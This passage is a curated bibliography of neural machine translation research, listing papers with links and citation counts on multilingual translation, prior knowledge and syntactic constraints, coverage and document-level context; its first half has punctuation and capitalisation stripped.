sdt 2005 sciodt 0 5 hl en 2 graeme blackwood miguel ballesteros and todd ward 2018 multilingual neural machine translation with task specific attention http aclweb org anthology c18 1263 in proceedings of coling 2018 citation https scholar google com scholar cites 2095693945870319009 as sdt 2005 sciodt 0 5 hl en 1 devendra singh sachan and graham neubig 2018 parameter sharing methods for multilingual self attentional translation models http aclweb org anthology w18 6327 in proceedings of the third conference on machine translation research papers emmanouil antonios platanios mrinmaya sachan graham neubig and tom mitchell 2018 contextual parameter generation for universal neural machine translation http aclweb org anthology d18 1039 in proceedings of emnlp 2018 yining wang jiajun zhang feifei zhai jingfang xu and chengqing zong 2018 three strategies to improve one to many multilingual translation http aclweb org anthology d18 1326 in proceedings of emnlp 2018 xu tan yi ren di he tao qin zhou zhao and tie yan liu 2019 multilingual neural machine translation with knowledge distillation https openreview net pdf id s1gusor9yx in proceedings of iclr 2019 xinyi wang hieu pham philip arthur and graham neubig 2019 multilingual neural machine translation with soft decoupled encoding https openreview net pdf id skeke3c5fm in proceedings of iclr 2019 maruan al shedivat and ankur p parikh 2019 consistency by agreement in zero shot neural machine translation https arxiv org pdf 1904 02338 pdf in proceedings of naacl 2019 roee aharoni melvin johnson and orhan firat 2019 massively multilingual neural machine translation https arxiv org pdf 1903 00089 pdf in proceedings of naacl 2019 yunsu kim yingbo gao and hermann ney 2019 effective cross lingual transfer of neural machine translation models without shared vocabularies https arxiv org pdf 1905 05475 in proceedings of acl 2019 carlos escolano marta r costa juss and jos a r fonollosa 2019 from bilingual to multilingual neural 
machine translation by incremental training https arxiv org pdf 1907 00735 in proceedings of acl 2019 yining wang long zhou jiajun zhang feifei zhai jingfang xu and chengqing zong 2019 a compact and language sensitive multilingual translation method https www aclweb org anthology p19 1117 in proceedings of acl 2019 sukanta sen kamal kumar gupta asif ekbal and pushpak bhattacharyya 2019 multilingual unsupervised nmt using shared encoder and language specific decoders https www aclweb org anthology p19 1297 in proceedings of acl 2019 xu tan jiale chen di he yingce xia tao qin and tie yan liu 2019 multilingual neural machine translation with language clustering https arxiv org pdf 1908 09324 in proceedings of emnlp 2019 sneha reddy kudugunta ankur bapna isaac caswell naveen arivazhagan and orhan firat 2019 investigating multilingual nmt representations at scale https arxiv org pdf 1909 02197 in proceedings of emnlp 2019 ankur bapna naveen arivazhagan and orhan firat 2019 simple scalable adaptation for neural machine translation https arxiv org pdf 1909 08478 in proceedings of emnlp 2019 raj dabre atsushi fujita and chenhui chu 2019 low resource neural machine translation by exploiting multilingualism through multi step fine tuning using n way parallel corpora https www aclweb org anthology d19 1146 in proceedings of emnlp 2019 xinyi wang yulia tsvetkov and graham neubig 2020 balancing training for multilingual neural machine translation https arxiv org abs 2004 06748 in proceedings of acl 2020 biao zhang philip williams ivan titov and rico sennrich 2020 improving massively multilingual neural machine translation and zero shot translation https arxiv org abs 2004 11867 in proceedings of acl 2020 haipeng sun rui wang kehai chen masao utiyama eiichiro sumita and tiejun zhao 2020 knowledge distillation for multilingual unsupervised neural machine translation https arxiv org abs 2004 10171 in proceedings of acl 2020 aditya siddhant ankur bapna yuan cao orhan firat mia chen 
sneha kudugunta naveen arivazhagan and yonghui wu 2020 leveraging monolingual data with self supervision for multilingual neural machine translation https arxiv org abs 2005 04816 in proceedings of acl 2020 changfeng zhu heng yu shanbo cheng and weihua luo 2020 language aware interlingua for multilingual neural machine translation https www aclweb org anthology 2020 acl main 150 in proceedings of acl 2020 zehui lin xiao pan mingxuan wang xipeng qiu jiangtao feng hao zhou lei li 2020 pre training multilingual neural machine translation by leveraging alignment information https www aclweb org anthology 2020 emnlp main 210 in proceedings of emnlp 2020 sungwon lyu bokyung son kichang yang jaekyoung bae 2020 revisiting modularized multilingual nmt to meet industrial demands https www aclweb org anthology 2020 emnlp main 476 in proceedings of emnlp 2020 arturo oncevay barry haddow alexandra birch 2020 bridging linguistic typology and multilingual machine translation with multi view language representations https www aclweb org anthology 2020 emnlp main 187 in proceedings of emnlp 2020 yiren wang chengxiang zhai hany hassan 2020 multi task learning for multilingual neural machine translation https www aclweb org anthology 2020 emnlp main 75 in proceedings of emnlp 2020 raj dabre chenhui chu anoop kunchukuttan 2020 a comprehensive survey of multilingual neural machine translation https arxiv org abs 2001 01115 arxiv 2001 01115 biao zhang ankur bapna rico sennrich orhan firat 2021 share or not learning to schedule language specific capacity for multilingual translation https openreview net pdf id wj4odo0uycf in proceedings of iclr 2021 h3 id prior knowledge integration prior knowledge integration h3 h4 id word phrase constraints word phrase constraints h4 wei he zhongjun he hua wu and haifeng wang 2016 improved nerual machine translation with smt features https www aaai org ocs index php aaai aaai16 paper view 12189 11577 in proceedings of aaai 2016 citation https scholar 
google com scholar cites 11596393526530282899 as sdt 2005 sciodt 0 5 hl en 46 haitao mi zhiguo wang and abe ittycheriah 2016 vocabulary manipulation for neural machine translation http anthology aclweb org p16 2021 in proceedings of acl 2016 citation https scholar google com scholar cites 10504291626587983597 as sdt 2005 sciodt 0 5 hl en 36 philip arthur graham neubig and satoshi nakamura 2016 incorporating discrete translation lexicons into neural machine translation http aclweb org anthology d16 1162 in proceedings of emnlp 2016 citation https scholar google com scholar cites 3629816068189607565 as sdt 2005 sciodt 0 5 hl en 55 xing wang zhengdong lu zhaopeng tu hang li deyi xiong min zhang 2017 neural machine translation advised by statistical machine translation https www aaai org ocs index php aaai aaai17 paper viewpaper 14451 in proceedings of aaai 2016 citation https scholar google com scholar cites 9788492799819599206 as sdt 2005 sciodt 0 5 hl en 34 jiacheng zhang yang liu huanbo luan jingfang xu and maosong sun 2017 prior knowledge integration for neural machine translation using posterior regularization http aclweb org anthology p17 1139 in proceedings of acl 2017 citation https scholar google com scholar cites 16820322563543305280 as sdt 2005 sciodt 0 5 hl en 13 chris hokamp and qun liu 2017 lexically constrained decoding for sequence generation using grid beam search http aclweb org anthology p17 1141 in proceedings of acl 2017 citation https scholar google com scholar cites 3629816068189607565 as sdt 2005 sciodt 0 5 hl en 19 zichao yang zhiting hu yuntian deng chris dyer and alex smola 2017 neural machine translation with recurrent attention modeling http aclweb org anthology e17 2061 in proceedings of eacl 2017 citation https scholar google com scholar cites 5621977008323303060 as sdt 2005 sciodt 0 5 hl en 25 ofir press and lior wolf 2017 using the output embedding to improve language models http aclweb org anthology e17 2025 in proceedings of eacl 
2017 citation https scholar google com scholar cites 3142797974561089298 as sdt 2005 sciodt 0 5 hl en 127 rajen chatterjee matteo negri marco turchi marcello federico lucia specia and fr d ric blain 2017 guiding neural machine translation decoding with external knowledge http aclweb org anthology w17 4716 in proceedings of the second conference on machine translation citation https scholar google com scholar cites 16027327382881304751 as sdt 2005 sciodt 0 5 hl en 8 rongxiang weng shujian huang zaixiang zheng xinyu dai and jiajun chen 2017 neural machine translation with word predictions http aclweb org anthology d17 1013 in proceedings of emnlp 2017 citation https scholar google com scholar cites 9033034245087042151 as sdt 2005 sciodt 0 5 hl en 8 yang feng shiyue zhang andi zhang dong wang and andrew abel 2017 memory augmented neural machine translation http aclweb org anthology d17 1146 in proceedings of emnlp 2017 citation https scholar google com scholar cites 825727884820810695 as sdt 2005 sciodt 0 5 hl en 9 leonard dahlmann evgeny matusov pavel petrushkov and shahram khadivi 2017 neural machine translation leveraging phrase based models in a hybrid search http aclweb org anthology d17 1148 in proceedings of emnlp 2017 citation https scholar google com scholar cites 4507716603851611885 as sdt 2005 sciodt 0 5 hl en 11 xing wang zhaopeng tu deyi xiong and min zhang 2017 translating phrases in neural machine translation http aclweb org anthology d17 1149 in proceedings of emnlp 2017 citation https scholar google com scholar cites 13251445351500921697 as sdt 2005 sciodt 0 5 hl en 15 baosong yang derek f wong tong xiao lidia s chao and jingbo zhu 2017 towards bidirectional hierarchical representations for attention based neural machine translation http aclweb org anthology d17 1150 in proceedings of emnlp 2017 citation https scholar google com scholar cites 18313642653606285813 as sdt 2005 sciodt 0 5 hl en 5 po sen huang chong wang sitao huang dengyong zhou and li 
deng 2018 towards neural phrase based machine translation https openreview net pdf id hktjec1rz in proceedings of iclr 2018 citation https scholar google com scholar cites 14839462711165509564 as sdt 2005 sciodt 0 5 hl en 15 toan nguyen and david chiang 2018 improving lexical choice in neural machine translation http aclweb org anthology n18 1031 in proceedings of naacl 2018 citation https scholar google com scholar cites 8911122350121698073 as sdt 2005 sciodt 0 5 hl en 8 huadong chen shujian huang david chiang xinyu dai and jiajun chen 2018 combining character and word information in neural machine translation using a multi level attention http aclweb org anthology n18 1116 in proceedings of naacl 2018 matt post and david vilar 2018 fast lexically constrained decoding with dynamic beam allocation for neural machine translation http aclweb org anthology n18 1119 in proceedings of naacl 2018 citation https scholar google com scholar cites 3504623917475500888 as sdt 2005 sciodt 0 5 hl en 6 jingyi zhang masao utiyama eiichro sumita graham neubig and satoshi nakamura 2018 guiding neural machine translation with retrieved translation pieces http aclweb org anthology n18 1120 in proceedings of naacl 2018 citation https scholar google com scholar cites 9376584188557423045 as sdt 2005 sciodt 0 5 hl en 2 eva hasler adri de gispert gonzalo iglesias and bill byrne 2018 neural machine translation decoding with terminology constraints http aclweb org anthology n18 2081 in proceedings of naacl 2018 citation https scholar google com scholar cites 17574582694557390759 as sdt 2005 sciodt 0 5 hl en 2 nima pourdamghani marjan ghazvininejad and kevin knight 2018 using word vectors to improve word alignments for low resource machine translation http aclweb org anthology n18 2083 in proceedings of naacl 2018 citation https scholar google com scholar cites 936856152380506206 as sdt 2005 sciodt 0 5 hl en 2 shuming ma xu sun yizhong wang and junyang lin 2018 bag of words as target for 
neural machine translation http aclweb org anthology p18 2053 in proceedings of acl 2018 citation https scholar google com scholar cites 4656961594972480096 as sdt 2005 sciodt 0 5 hl en 10 mingxuan wang jun xie zhixing tan jinsong su deyi xiong and chao bian 2018 neural machine translation with decoding history enhanced attention http aclweb org anthology c18 1124 in proceedings of coling 2018 arata ugawa akihiro tamura takashi ninomiya hiroya takamura and manabu okumura 2018 neural machine translation incorporating named entity http aclweb org anthology c18 1274 in proceedings of coling 2018 longyue wang zhaopeng tu andy way and qun liu 2018 learning to jointly translate and predict dropped pronouns with a shared reconstruction mechanism http aclweb org anthology d18 1333 in proceedings of emnlp 2018 citation https scholar google com scholar cites 7240636423092684747 as sdt 2005 sciodt 0 5 hl en 1 qian cao and deyi xiong 2018 encoding gated translation memory into neural machine translation http aclweb org anthology d18 1340 in proceedings of emnlp 2018 chengyue gong di he xu tan tao qin liwei wang and tie yan liu 2018 frage frequency agnostic word representation https arxiv org pdf 1809 06858 in proceedings of neurips 2018 citation https scholar google com scholar cites 899516517229807927 as sdt 2005 sciodt 0 5 hl en 2 inigo jauregi unanue ehsan zare borzeshi nazanin esmaili and massimo piccardi rewe regressing word embeddings for regularization of neural machine translation systems https arxiv org pdf 1904 02461 pdf in proceedings of naacl 2019 kai song yue zhang heng yu weihua luo kun wang and min zhang 2019 code switching for enhancing nmt with pre specified translation https www aclweb org anthology n19 1044 in proceedings of naacl 2019 xuebo liu derek f wong yang liu lidia s chao tong xiao and jingbo zhu 2019 shared private bilingual word embeddings for neural machine translation https arxiv org pdf 1906 03100 in proceedings of acl 2019 georgiana dinu 
prashant mathur marcello federico and yaser al onaizan 2019 training neural machine translation to apply terminology constraints https www aclweb org anthology p19 1294 in proceedings of acl 2019 longyue wang zhaopeng tu xing wang and shuming shi 2019 one model to learn both zero pronoun prediction and translation https www aclweb org anthology d19 1085 pdf in proceedings of emnlp 2019 jinhua zhu yingce xia lijun wu di he tao qin wengang zhou houqiang li tieyan liu 2020 incorporating bert into neural machine translation https openreview net forum id hyl7ygstwb in proceedings of iclr 2020 hongfei xu josef van genabith deyi xiong qiuhui liu and jingyi zhang 2020 learning source phrase representations for neural machine translation https www aclweb org anthology 2020 acl main 37 in proceedings of acl 2020 raymond hendy susanto shamil chollampatt and liling tan 2020 lexically constrained neural machine translation with levenshtein transformer https arxiv org abs 2004 12681 in proceedings of acl 2020 thomas zenkel joern wuebker and john denero 2020 end to end neural word alignment outperforms giza https www aclweb org anthology 2020 acl main 146 in proceedings of acl 2020 liang ding longyue wang and dacheng tao 2020 self attention with cross lingual position representation https www aclweb org anthology 2020 acl main 153 in proceedings of acl 2020 marion weller di marco and alexander fraser 2020 modeling word formation in english german neural machine translation https www aclweb org anthology 2020 acl main 389 in proceedings of acl 2020 yun chen yang liu guanhua chen xin jiang qun liu 2020 accurate word alignment induction from neural machine translation https www aclweb org anthology 2020 emnlp main 42 in proceedings of emnlp 2020 prathyusha jwalapuram shafiq joty youlin shen 2020 pronoun targeted fine tuning for nmt with hybrid losses https www aclweb org anthology 2020 emnlp main 177 in proceedings of emnlp 2020 jingyi zhang josef van genabith a bidirectional 
transformer based alignment model for unsupervised word alignment https aclanthology org 2021 acl long 24 pdf in proceedings of acl 2021 h4 id syntactic semantic constraints syntactic semantic constraints h4 trevor cohn cong duy vu hoang ekaterina vymolova kaisheng yao chris dyer and gholamreza haffari 2016 incorporating structural alignment biases into an attentional neural translation model https arxiv org pdf 1601 01085 pdf in proceedings of naacl 2016 citation https scholar google com hk scholar cites 6876101136632328854 as sdt 2005 sciodt 0 5 hl en 80 yong cheng shiqi shen zhongjun he wei he hua wu maosong sun and yang liu 2016 agreement based joint training for bidirectional attention based neural machine translation http nlp csai tsinghua edu cn ly papers ijcai16 agree pdf in proceedings of ijcai 2016 citation https scholar google com hk scholar cites 7726998929707665947 as sdt 2005 sciodt 0 5 hl en 26 akiko eriguchi kazuma hashimoto and yoshimasa tsuruoka 2016 tree to sequence attentional neural machine translation http aclweb org anthology p16 1078 in proceedings of acl 2016 citation https scholar google com hk scholar cites 10114639659174243367 as sdt 2005 sciodt 0 5 hl en 79 felix stahlberg eva hasler aurelien waite and bill byrne 2016 syntactically guided neural machine translation http anthology aclweb org p16 2049 in proceedings of acl 2016 citation https scholar google com scholar um 1 ie utf 8 lr cites 11012034683105038430 32 xing shi inkit padhi and kevin knight 2016 does string based neural mt learn source syntax http aclweb org anthology d16 1159 in proceedings of the emnlp 2016 citation https scholar google com scholar oi bibs hl en cites 13782051589621719871 57 junhui li deyi xiong zhaopeng tu muhua zhu min zhang and guodong zhou 2017 modeling source syntax for neural machine translation http aclweb org anthology p17 1064 in proceedings of acl 2017 citation https scholar google com hk scholar cites 4418568278013664001 as sdt 2005 sciodt 0 5 hl 
en 30
* Shuangzhi Wu, Dongdong Zhang, Nan Yang, Mu Li, and Ming Zhou. 2017. [Sequence-to-Dependency Neural Machine Translation](http://aclweb.org/anthology/P17-1065). In *Proceedings of ACL 2017*. ([Citation](https://scholar.google.com.hk/scholar?cites=13183481097489234938&as_sdt=2005&sciodt=0,5&hl=en): 19)
* Jinchao Zhang, Mingxuan Wang, Qun Liu, and Jie Zhou. 2017. [Incorporating Word Reordering Knowledge into Attention-based Neural Machine Translation](http://aclweb.org/anthology/P17-1140). In *Proceedings of ACL 2017*. ([Citation](https://scholar.google.com.hk/scholar?cites=9939097556529491198&as_sdt=2005&sciodt=0,5&hl=en): 8)
* Huadong Chen, Shujian Huang, David Chiang, and Jiajun Chen. 2017. [Improved Neural Machine Translation with a Syntax-Aware Encoder and Decoder](http://aclweb.org/anthology/P17-1177). In *Proceedings of ACL 2017*. ([Citation](https://scholar.google.com.hk/scholar?cites=17162498190462264248&as_sdt=2005&sciodt=0,5&hl=en): 32)
* Akiko Eriguchi, Yoshimasa Tsuruoka, and Kyunghyun Cho. 2017. [Learning to Parse and Translate Improves Neural Machine Translation](http://aclweb.org/anthology/P17-2012). In *Proceedings of ACL 2017*. ([Citation](https://scholar.google.com.hk/scholar?cites=17499695818526131085&as_sdt=2005&sciodt=0,5&hl=en): 29)
* Roee Aharoni and Yoav Goldberg. 2017. [Towards String-to-Tree Neural Machine Translation](http://aclweb.org/anthology/P17-2021). In *Proceedings of ACL 2017*. ([Citation](https://scholar.google.com.hk/scholar?cites=13743835036381505969&as_sdt=2005&sciodt=0,5&hl=en): 45)
* Kazuma Hashimoto and Yoshimasa Tsuruoka. 2017. [Neural Machine Translation with Source-Side Latent Graph Parsing](http://aclweb.org/anthology/D17-1012). In *Proceedings of EMNLP 2017*. ([Citation](https://scholar.google.com.hk/scholar?cites=2595733316497621779&as_sdt=2005&sciodt=0,5&hl=en): 9)
* Joost Bastings, Ivan Titov, Wilker Aziz, Diego Marcheggiani, and Khalil Sima'an. 2017. [Graph Convolutional Encoders for Syntax-aware Neural Machine Translation](http://aclweb.org/anthology/D17-1209). In *Proceedings of EMNLP 2017*. ([Citation](https://scholar.google.com.hk/scholar?cites=4876389727678322394&as_sdt=2005&sciodt=0,5&hl=en): 31)
* Kehai Chen, Rui Wang, Masao Utiyama, Lemao Liu, Akihiro Tamura, Eiichiro Sumita, and Tiejun Zhao. 2017. [Neural Machine Translation with Source Dependency Representation](http://aclweb.org/anthology/D17-1304). In *Proceedings of EMNLP 2017*. ([Citation](https://scholar.google.com.hk/scholar?cites=3839215870693368887&as_sdt=2005&sciodt=0,5&hl=en): 7)
* Peyman Passban, Qun Liu, and Andy Way. 2018. [Improving Character-Based Decoding Using Target-Side Morphological Information for Neural Machine Translation](http://aclweb.org/anthology/N18-1006). In *Proceedings of NAACL 2018*. ([Citation](https://scholar.google.com.hk/scholar?cites=13968879243228181963&as_sdt=2005&sciodt=0,5&hl=en): 5)
* Diego Marcheggiani, Joost Bastings, and Ivan Titov. 2018. [Exploiting Semantics in Neural Machine Translation with Graph Convolutional Networks](http://aclweb.org/anthology/N18-2078). In *Proceedings of NAACL 2018*. ([Citation](https://scholar.google.com.hk/scholar?cites=9319609055086898131&as_sdt=2005&sciodt=0,5&hl=en): 7)
* Chunpeng Ma, Akihiro Tamura, Masao Utiyama, Tiejun Zhao, and Eiichiro Sumita. 2018. [Forest-Based Neural Machine Translation](http://aclweb.org/anthology/P18-1116). In *Proceedings of ACL 2018*. ([Citation](https://scholar.google.com.hk/scholar?cites=8184521634220071433&as_sdt=2005&sciodt=0,5&hl=en): 1)
* Shaohui Kuang, Junhui Li, António Branco, Weihua Luo, and Deyi Xiong. 2018. [Attention Focusing for Neural Machine Translation by Bridging Source and Target Embeddings](http://aclweb.org/anthology/P18-1164). In *Proceedings of ACL 2018*. ([Citation](https://scholar.google.com.hk/scholar?cites=13357719581808108940&as_sdt=2005&sciodt=0,5&hl=en): 1)
* Duygu Ataman and Marcello Federico. 2018. [Compositional Representation of Morphologically-Rich Input for Neural Machine Translation](http://aclweb.org/anthology/P18-2049). In *Proceedings of ACL 2018*. ([Citation](https://scholar.google.com.hk/scholar?cites=12939556873639208603&as_sdt=2005&sciodt=0,5&hl=en): 4)
* Daniel Beck, Gholamreza Haffari, and Trevor Cohn. 2018. [Graph-to-Sequence Learning using Gated Graph Neural Networks](http://aclweb.org/anthology/P18-1026). In *Proceedings of ACL 2018*. ([Citation](https://scholar.google.com.au/scholar?cites=12197496840503693067&as_sdt=2005&sciodt=0,5&hl=en): 3)
* Danielle Saunders, Felix Stahlberg, Adrià de Gispert, and Bill Byrne. 2018. [Multi-representation Ensembles and Delayed SGD Updates Improve Syntax-based NMT](http://aclweb.org/anthology/P18-2051). In *Proceedings of ACL 2018*.
* Wen Zhang, Jiawei Hu, Yang Feng, and Qun Liu. 2018. [Refining Source Representations with Relation Networks for Neural Machine Translation](http://aclweb.org/anthology/C18-1110). In *Proceedings of COLING 2018*.
* Poorya Zaremoodi and Gholamreza Haffari. 2018. [Incorporating Syntactic Uncertainty in Neural Machine Translation with a Forest-to-Sequence Model](http://aclweb.org/anthology/C18-1120). In *Proceedings of COLING 2018*.
* Hao Zhang, Axel Ng, and Richard Sproat. 2018. [Fast and Accurate Reordering with ITG Transition RNN](http://aclweb.org/anthology/C18-1123). In *Proceedings of COLING 2018*.
* Jetic Gū, Hassan S. Shavarani, and Anoop Sarkar. 2018. [Top-down Tree Structured Decoding with Syntactic Connections for Neural Machine Translation and Parsing](http://aclweb.org/anthology/D18-1037). In *Proceedings of EMNLP 2018*.
* Anna Currey and Kenneth Heafield. 2018. [Multi-Source Syntactic Neural Machine Translation](http://aclweb.org/anthology/D18-1327). In *Proceedings of EMNLP 2018*.
* Xinyi Wang, Hieu Pham, Pengcheng Yin, and Graham Neubig. 2018. [A Tree-based Decoder for Neural Machine Translation](http://aclweb.org/anthology/D18-1509). In *Proceedings of EMNLP 2018*. ([Citation](https://scholar.google.com.hk/scholar?cites=9083843868999368969&as_sdt=2005&sciodt=0,5&hl=en): 1)
* Eliyahu Kiperwasser and Miguel Ballesteros. 2018. [Scheduled Multi-Task Learning: From Syntax to Translation](http://aclweb.org/anthology/Q18-1017). *Transactions of the Association for Computational Linguistics*. ([Citation](https://scholar.google.com.hk/scholar?cites=7224616032403591303&as_sdt=2005&sciodt=0,5&hl=en): 4)
* Xiao Pu, Nikolaos Pappas, James Henderson, and Andrei Popescu-Belis. 2018. [Integrating Weakly Supervised Word Sense Disambiguation into Neural Machine Translation](https://www.aclweb.org/anthology/Q18-1044). *Transactions of the Association for Computational Linguistics*.
* Kai Song, Yue Zhang, Min Zhang, and Weihua Luo. 2018. [Improved English to Russian Translation by Neural Suffix Prediction](https://arxiv.org/pdf/1801.03615). In *Proceedings of AAAI 2018*.
* Rudra Murthy V, Anoop Kunchukuttan, and Pushpak Bhattacharyya. 2019. [Addressing Word-Order Divergence in Multilingual Neural Machine Translation for Extremely Low Resource Languages](https://arxiv.org/pdf/1811.00383.pdf). In *Proceedings of NAACL 2019*.
* Meishan Zhang, Zhenghua Li, Guohong Fu, and Min Zhang. 2019. [Syntax-Enhanced Neural Machine Translation with Syntax-Aware Word Representations](https://arxiv.org/pdf/1905.02878). In *Proceedings of NAACL 2019*.
* Linfeng Song, Daniel Gildea, Yue Zhang, Zhiguo Wang, and Jinsong Su. 2019. [Semantic Neural Machine Translation Using AMR](https://www.aclweb.org/anthology/Q19-1002). *Transactions of the Association for Computational Linguistics*.
* Nader Akoury, Kalpesh Krishna, and Mohit Iyyer. 2019. [Syntactically Supervised Transformers for Faster Neural Machine Translation](https://arxiv.org/pdf/1906.02780). In *Proceedings of ACL 2019*.
* Zhijiang Guo, Yan Zhang, Zhiyang Teng, and Wei Lu. 2019. [Densely Connected Graph Convolutional Networks for Graph-to-Sequence Learning](https://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00269). *Transactions of the Association for Computational Linguistics*.
* Xuewen Yang, Yingru Liu, Dongliang Xie, Xin Wang, and Niranjan Balasubramanian. 2019. [Latent Part-of-Speech Sequences for Neural Machine Translation](https://arxiv.org/pdf/1908.11782). In *Proceedings of EMNLP 2019*.
* Jie Hao, Xing Wang, Shuming Shi, Jinfeng Zhang, and Zhaopeng Tu. 2019. [Multi-Granularity Self-Attention for Neural Machine Translation](https://arxiv.org/pdf/1909.02222). In *Proceedings of EMNLP 2019*.
* Jie Hao, Xing Wang, Shuming Shi, Jinfeng Zhang, and Zhaopeng Tu. 2019. [Towards Better Modeling Hierarchical Structure for Self-Attention with Ordered Neurons](https://arxiv.org/pdf/1909.01562). In *Proceedings of EMNLP 2019*.
* KayYen Wong, Sameen Maruf, and Gholamreza Haffari. 2020. [Contextual Neural Machine Translation Improves Translation of Cataphoric Pronouns](https://arxiv.org/abs/2004.09894). In *Proceedings of ACL 2020*.
* Emanuele Bugliarello and Naoaki Okazaki. 2020. [Enhancing Machine Translation with Dependency-Aware Self-Attention](http://arxiv.org/abs/1909.03149). In *Proceedings of ACL 2020*.
* Kehai Chen, Rui Wang, Masao Utiyama, and Eiichiro Sumita. 2020. [Content Word Aware Neural Machine Translation](https://www.aclweb.org/anthology/2020.acl-main.34). In *Proceedings of ACL 2020*.
* Jian Yang, Shuming Ma, Dongdong Zhang, Zhoujun Li, and Ming Zhou. 2020. [Improving Neural Machine Translation with Soft Template Prediction](https://www.aclweb.org/anthology/2020.acl-main.531). In *Proceedings of ACL 2020*.
* R. Thomas McCoy, Robert Frank, and Tal Linzen. 2020. [Does Syntax Need to Grow on Trees? Sources of Hierarchical Inductive Bias in Sequence-to-Sequence Networks](https://transacl.org/ojs/index.php/tacl/article/view/1892). *Transactions of the Association for Computational Linguistics*.

<h4 id="coverage_constraints">Coverage Constraints</h4>

* Zhaopeng Tu, Zhengdong Lu, Yang Liu, Xiaohua Liu, and Hang Li. 2016. [Modeling Coverage for Neural Machine Translation](http://aclweb.org/anthology/P16-1008). In *Proceedings of ACL 2016*. ([Citation](https://scholar.google.com.hk/scholar?cites=894656013823838967&as_sdt=2005&sciodt=0,5&hl=en): 236)
* Haitao Mi, Baskaran Sankaran, Zhiguo Wang, and Abe Ittycheriah. 2016. [Coverage Embedding Models for Neural Machine Translation](http://aclweb.org/anthology/D16-1096). In *Proceedings of EMNLP 2016*. ([Citation](https://scholar.google.com.hk/scholar?cites=10478809182142146899&as_sdt=2005&sciodt=0,5&hl=en): 59)
* Zhaopeng Tu, Yang Liu, Zhengdong Lu, Xiaohua Liu, and Hang Li. 2017. [Context Gates for Neural Machine Translation](http://aclweb.org/anthology/Q17-1007). *Transactions of the Association for Computational Linguistics*. ([Citation](https://scholar.google.com/scholar?cites=4217513324479200768&as_sdt=2005&sciodt=0,5&hl=en): 36)
* Yanyang Li, Tong Xiao, Yinqiao Li, Qiang Wang, Changming Xu, and Jingbo Zhu. 2018. [A Simple and Effective Approach to Coverage-Aware Neural Machine Translation](http://aclweb.org/anthology/P18-2047). In *Proceedings of ACL 2018*. ([Citation](https://scholar.google.com.hk/scholar?cites=9588245142858602659&as_sdt=2005&sciodt=0,5&hl=en): 1)
* Zaixiang Zheng, Hao Zhou, Shujian Huang, Lili Mou, Xinyu Dai, Jiajun Chen, and Zhaopeng Tu. 2018. [Modeling Past and Future for Neural Machine Translation](https://aclanthology.coli.uni-saarland.de/events/tacl-2018). *Transactions of the Association for Computational Linguistics*. ([Citation](https://scholar.google.com.hk/scholar?cites=3361428233702531610&as_sdt=2005&sciodt=0,5&hl=en): 10)
* Xiang Kong, Zhaopeng Tu, Shuming Shi, Eduard Hovy, and Tong Zhang. 2019. [Neural Machine Translation with Adequacy-Oriented Learning](https://arxiv.org/pdf/1811.08541.pdf). In *Proceedings of AAAI 2019*.
* Zaixiang Zheng, Shujian Huang, Zhaopeng Tu, Xin-Yu Dai, and Jiajun Chen. 2019. [Dynamic Past and Future for Neural Machine Translation](https://www.aclweb.org/anthology/D19-1086). In *Proceedings of EMNLP 2019*.

<h3 id="document_level_translation">Document-level Translation</h3>

* Longyue Wang, Zhaopeng Tu, Andy Way, and Qun Liu. 2017. [Exploiting Cross-Sentence Context for Neural Machine Translation](http://aclweb.org/anthology/D17-1301). In *Proceedings of EMNLP 2017*. ([Citation](https://scholar.google.com/scholar?cites=7614033458131200423&as_sdt=2005&sciodt=0,5&hl=en): 19)
* Jörg Tiedemann and Yves Scherrer. 2017. [Neural Machine Translation with Extended Context](http://www.aclweb.org/anthology/W17-4811). In *Proceedings of the Third Workshop on Discourse in Machine Translation*. ([Citation](https://scholar.google.com/scholar?um=1&ie=UTF-8&lr&cites=16950693252825831302): 12)
* Rachel Bawden, Rico Sennrich, Alexandra Birch, and Barry Haddow. 2018. [Evaluating Discourse Phenomena in Neural Machine Translation](http://aclweb.org/anthology/N18-1118). In *Proceedings of NAACL 2018*. ([Citation](https://scholar.google.com/scholar?cites=1436848483757205177&as_sdt=2005&sciodt=0,5&hl=en): 11)
* Elena Voita, Pavel Serdyukov, Rico Sennrich, and Ivan Titov. 2018. [Context-Aware Neural Machine Translation Learns Anaphora Resolution](http://aclweb.org/anthology/P18-1117). In *Proceedings of ACL 2018*. ([Citation](https://scholar.google.com/scholar?cites=16594777811418303416&as_sdt=2005&sciodt=0,5&hl=en): 7)
* Sameen Maruf and Gholamreza Haffari. 2018. [Document Context Neural Machine Translation with Memory Networks](http://aclweb.org/anthology/P18-1118). In *Proceedings of ACL 2018*. ([Citation](https://scholar.google.com/scholar?cites=17337605639464710308&as_sdt=2005&sciodt=0,5&hl=en): 5)
* Shaohui Kuang, Deyi Xiong, Weihua Luo, and Guodong Zhou. 2018. [Modeling Coherence for Neural Machine Translation with Dynamic and Topic Caches](http://aclweb.org/anthology/C18-1050). In *Proceedings of COLING 2018*. ([Citation](https://scholar.google.com/scholar?cites=12991114209233735355&as_sdt=2005&sciodt=0,5&hl=en): 1)
* Shaohui Kuang and Deyi Xiong. 2018. [Fusing Recency into Neural Machine Translation with an Inter-Sentence Gate Model](https://arxiv.org/pdf/1806.04466.pdf). In *Proceedings of COLING 2018*.
* Jiacheng Zhang, Huanbo Luan, Maosong Sun, Feifei Zhai, Jingfang Xu, Min Zhang, and Yang Liu. 2018. [Improving the Transformer Translation Model with Document-Level Context](http://aclweb.org/anthology/D18-1049). In *Proceedings of EMNLP 2018*.
* Samuel Läubli, Rico Sennrich, and Martin Volk. 2018. [Has Machine Translation Achieved Human Parity? A Case for Document-level Evaluation](http://aclweb.org/anthology/D18-1512). In *Proceedings of EMNLP 2018*. ([Citation](https://scholar.google.com/scholar?cites=13135618112238453725&as_sdt=2005&sciodt=0,5&hl=en): 1)
* Lesly Miculicich, Dhananjay Ram, Nikolaos Pappas, and James Henderson. 2018. [Document-Level Neural Machine Translation with Hierarchical Attention Networks](http://aclweb.org/anthology/D18-1325). In *Proceedings of EMNLP 2018*.
* Zhaopeng Tu, Yang Liu, Shuming Shi, and Tong Zhang. 2018. [Learning to Remember Translation History with a Continuous Cache](https://arxiv.org/pdf/1711.09367.pdf). *Transactions of the Association for Computational Linguistics*. ([Citation](https://scholar.google.com/scholar?cites=15854294745619374487&as_sdt=2005&sciodt=0,5&hl=en): 9)
* Elena Voita, Rico Sennrich, and Ivan Titov. 2019. [When a Good Translation is Wrong in Context: Context-Aware Machine Translation Improves on Deixis, Ellipsis, and Lexical Cohesion](https://arxiv.org/pdf/1905.05979). In *Proceedings of ACL 2019*.
